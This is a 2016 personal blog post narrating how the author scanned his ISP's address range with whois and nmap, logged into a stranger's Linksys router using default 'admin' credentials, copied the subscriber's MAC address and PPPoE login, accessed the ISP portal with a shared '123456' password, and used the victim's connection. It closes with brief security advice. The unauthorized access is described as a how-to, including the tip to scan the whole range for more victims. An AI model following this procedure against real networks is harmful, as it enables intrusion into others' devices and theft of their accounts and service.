Saturday, 23 April 2016

Hacking ISP For Fun and Profit

This post is about how I could hack my ISP subscribers to get free Internet so if you are not interested then you can get back to your work :)

*Let's start*

From last few days I have been participating in bug bounty programs , got some success with Motorola but I got bored and tired of testing web applications so I decided to leave bug hunting for a while and started to play with my router's different features then I saw a feature named "Remote Web Management".  It just allows users to access and manage their router from Internet.




I was wondered why do we even need this feature?
And what is it's use since IP addresses are assigned dynamically (unless you are rich enough to get a static IP address)?

So I thought there could be some router's which may have this option enabled by default and also there's a chance that one would enable this option unknowingly or knowingly (static IP address people ,remember ? ).

And fortunately some thug people don't even bother to change their default password of router web interface and some router don't even provide an option to change the password of web interface.  #ultra_thug_life


So I thought to look for such routers in my ISP network.





I have DSL Broadband Internet connection so each user is provided with a username and password to connect to Internet via PPPOE .

And the server only checks MAC address, username and password before establishing the connection.In other words if you can get users MAC, username and password you can login to their PPPOE account to connect to Internet.

So first thing I did was I went to my router's status page and checked the internet connection information



Ok! Here WAN IP address is 172.x.x.10 which was a public IP address (class B).
So we can now conclude that after successful authentication, ISP is allowing my router to establish P2P connection to IP 172.x.x.10.

In short ISP is assigning my router a public IP address 172.x.x.10 which can be accessed over Internet and that means anyone can access my router over Internet by IP address 172.x.x.10 if I enabled remote web management feature.


Now next thing I had to do is find out IP addresses block range owned by my ISP.

So our old friend "whois" is agreed to help me with it.







According to "whois" my ISP owns Ip addresses block range 172.x.x.0-172.x.x.255 .
Now next thing that I need to do is to find out all IP addresses in this range having 80 and 8080 open port.

This time our old friend "nmap" is agreed to help me with it.






Note : I just scanned small range of IP address from ISP range to get results faster , you can scan whole range of IP owned by ISP to get more results


Got 3 IP address's with open ports 80 and 8080

 So I opened all IP addresses in browser :

http://172.x.x.84:8080
http://172.x.x.129
http://127.x.x.228

One of them was Surveillance Camera, one was just blank html page and one was a Router - http://172.x.x.84:8080

It was a Linksys Router , I tried my luck with very hard to guess password "admin" and you guessed it right. I was in.

Always remember "admin":"admin" and "admin":BLANK PASSWORD never fails in such situations.


Now what?
Obviously I went to status page of that router and copied the MAC address and PPPOE credentials (username and password) .
Now I logged in to our ISP website where I can see information of connection, plan, speed, validity ,etc by logging in using obtained username and password "123456".
Yes bro, "123456" is what they thought the most secure password is so they decided to assign it to every user account.  Smarty pants, right?

 After log in I found out the obtained account has a good Internet plan.



Now I set the obtained credentials in to my router and ...





After speed test I removed his PPPOE account and logged in to my own PPPOE account cz it's not ethical to steal someones Internet




Conclusion:

-Think before you enable "Remote Web Management" feature in your router
-Always change default password of your router
-Never assign same passwords to all users  (for ISP)


Thanks